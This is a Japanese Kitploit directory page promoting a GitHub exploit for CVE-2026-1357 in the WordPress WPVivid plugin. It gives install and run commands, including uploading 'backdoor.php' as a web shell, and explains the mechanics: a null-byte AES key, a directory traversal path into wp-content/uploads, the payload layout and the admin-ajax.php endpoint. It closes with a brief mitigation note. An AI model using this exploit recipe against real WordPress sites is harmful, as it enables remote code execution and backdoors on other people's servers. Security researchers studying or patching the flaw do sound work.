Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Exploit-CVE-2026-1357 — CVE-2026-1357 の WordPress WPVivid プラグイン用エクスプロイト。細工された AES 暗号化ペイロードとディレクトリトラバーサルを介してリモートコード実行を可能にし、Webシェルをアップロードします。 | Kitploit
ツール/GitHubGitHub/itsismarcos/exploit-cve-2026-1357
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubitsismarcos/exploit-cve-2026-1357

Exploit-CVE-2026-1357

CVE-2026-1357 の WordPress WPVivid プラグイン用エクスプロイト。細工された AES 暗号化ペイロードとディレクトリトラバーサルを介してリモートコード実行を可能にし、Webシェルをアップロードします。

リポジトリを見る
16ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

依存関係のインストール

pip3 install pycryptodome requests

基本エクスプロイト

python3 wpvivi.py http://target.com

カスタムWebシェル

python3 wpvivi.py http://target.com --shell backdoor.php

python3 wpvivi.py http://target.com --code "" 技術的な説明: Null Byte Key: RSA復号が失敗するとfalseが返り、phpseclibはそれを「\x00\x00\x00」として扱います。AES-128 ECBのキーとして16個のnullバイトを使用します。 Directory Traversal: ファイル名がサニタイズされておらず、../../../../wp-content/uploads/shell.php が可能です。 ペイロード形式:

[len_key_hex(2バイト)] + [key_hex] + [len_data_hex(16バイト)] + [encrypted_data] 実行: POSTを /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site に送信 wpvivid_content = base64(暗号化されたペイロード) 検出と緩和策:

0.9.124でパッチ適用済み:

  • チェック if ($key === false || empty($key)) return false;
  • 拡張子ホワイトリスト: zip,gz,tar,sql
ツールをダウンロード